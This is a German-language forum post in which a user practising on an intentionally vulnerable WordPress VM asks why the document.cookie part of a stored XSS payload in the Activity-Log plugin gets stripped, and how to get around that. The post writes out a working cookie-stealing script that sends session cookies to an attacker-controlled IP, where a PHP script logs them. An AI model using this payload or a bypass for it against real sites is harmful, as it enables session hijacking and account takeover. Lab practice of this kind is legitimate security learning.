2
Javascript wird nicht komplett angezeigt
Hi Experten,
ich befasse mich gerade etwas mit XSS und habe dazu eine verwundbare Wordpress VM installiert. Dort ist das Plugin Activity-Log in einer verwundbaren Version installiert. Damit ist es möglich einen stored XSS Angriff durchzuführen.
Hier die Infos zum verwundbaren Plug-In inkl. PoC
https://www.exploit-db.com/exploits/40083/
Hier mal mein "AngriffsCode"
Auf meiner Angriffsmaschine lüft ein kleines PHP-Script, das mir das empfangene Cookie dann ordentlich in eine Datei schreibt. Führe ich das Javascript in der Browser console aus, dann klappt alles wunderbar.
Führe ich jedoch den eigentlichen Angriff aus, dann klappt leider nichts mehr. Deshalb habe ich mir dann mal den Seitenquelltext der Wordpress-Kiste angeschaut. Und mein JavaScript Teil sieht dann so aus:
irgendwie kommt also der document.cookie Teil abhanden. Hat jemand eine Idee warum, bzw. kann ich das umgehen?
Danke schon mal für eure Hilfe
ich befasse mich gerade etwas mit XSS und habe dazu eine verwundbare Wordpress VM installiert. Dort ist das Plugin Activity-Log in einer verwundbaren Version installiert. Damit ist es möglich einen stored XSS Angriff durchzuführen.
Hier die Infos zum verwundbaren Plug-In inkl. PoC
https://www.exploit-db.com/exploits/40083/
Hier mal mein "AngriffsCode"
<script>new Image().src='http://192.168.241.132/?c='+document.cookie;</script> Auf meiner Angriffsmaschine lüft ein kleines PHP-Script, das mir das empfangene Cookie dann ordentlich in eine Datei schreibt. Führe ich das Javascript in der Browser console aus, dann klappt alles wunderbar.
Führe ich jedoch den eigentlichen Angriff aus, dann klappt leider nichts mehr. Deshalb habe ich mir dann mal den Seitenquelltext der Wordpress-Kiste angeschaut. Und mein JavaScript Teil sieht dann so aus:
<script>new Image().src=\'http://192.168.241.132/?c=\'+</td><td class='type column-type'>User</td> ......... irgendwie kommt also der document.cookie Teil abhanden. Hat jemand eine Idee warum, bzw. kann ich das umgehen?
Danke schon mal für eure Hilfe
Auf Facebook teilen
Auf Twitter teilen
Auf Reddit teilen
Auf Linkedin teilenBitte markiere auch die Kommentare, die zur Lösung des Beitrags beigetragen haben
Content-ID: 353360
Url: https://administrator.de/contentid/353360
Ausgedruckt am: 22.11.2024 um 22:11 Uhr
2 Kommentare
Neuester Kommentar
Seit wann ist es denn verboten eine VM von Vulnhub zu bearbeiten?
